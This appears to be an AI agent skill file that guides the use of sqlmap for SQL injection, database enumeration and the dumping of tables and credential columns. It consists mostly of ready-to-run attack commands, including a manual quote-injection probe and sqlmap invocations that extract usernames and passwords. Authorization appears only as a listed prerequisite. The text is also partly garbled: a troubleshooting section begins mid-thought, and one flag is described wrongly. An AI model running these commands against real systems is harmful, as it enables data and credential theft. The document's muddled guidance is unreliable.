This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.
Inputs / Prerequisites
Target URL: Web application URL with injectable parameter (e.g., ?id=1)
SQLMap Installation: Pre-installed on Kali Linux or downloaded from GitHub
Verified Injection Point: URL parameter confirmed or suspected to be SQL injectable
Request File (Optional): Burp Suite captured HTTP request for POST-based injection
Authorization: Written permission for penetration testing activities
Outputs / Deliverables
Database Enumeration: List of all databases on the target server
Table Structure: Complete table names within target database
Column Mapping: Column names and data types for each table
Extracted Data: Dumped records including usernames, passwords, and sensitive data
Hash Values: Password hashes for offline cracking
Vulnerability Report: Confirmation of SQL injection type and severity
Core Workflow
1. Identify SQL Injection Vulnerability
Manual Verification
# Add single quote to break query
http://target.com/page.php?id=1'
# If error message appears, likely SQL injectable
# Error example: "You have an error in your SQL syntax"
Initial SQLMap Scan
# Basic vulnerability detection
sqlmap -u "http://target.com/page.php?id=1" --batch
# With verbosity for detailed output
sqlmap -u "http://target.com/page.php?id=1" --batch -v 3
Cause: Default time delay too conservative
Solution:
# Reduce time delay (risky, may cause false negatives)
sqlmap -u "URL" --dbs --batch --time-sec=3
# Use boolean-based instead if possible
sqlmap -u "URL" --dbs --batch --technique=B
Issue: Cannot Dump Large Tables
Cause: Table has too many records
Solution:
# Limit number of records
sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100
# Dump specific columns only
sqlmap -u "URL" -D db -T table -C username,password --dump --batch
# Exclude specific columns
sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs
Issue: Session Drops During Long Scan
Cause: Session timeout or connection reset
Solution:
# Save and resume session
sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session
# Resume from saved session
sqlmap -u "URL" --dbs --batch --resume
# Use persistent HTTP connection
sqlmap -u "URL" --dbs --batch --keep-alive
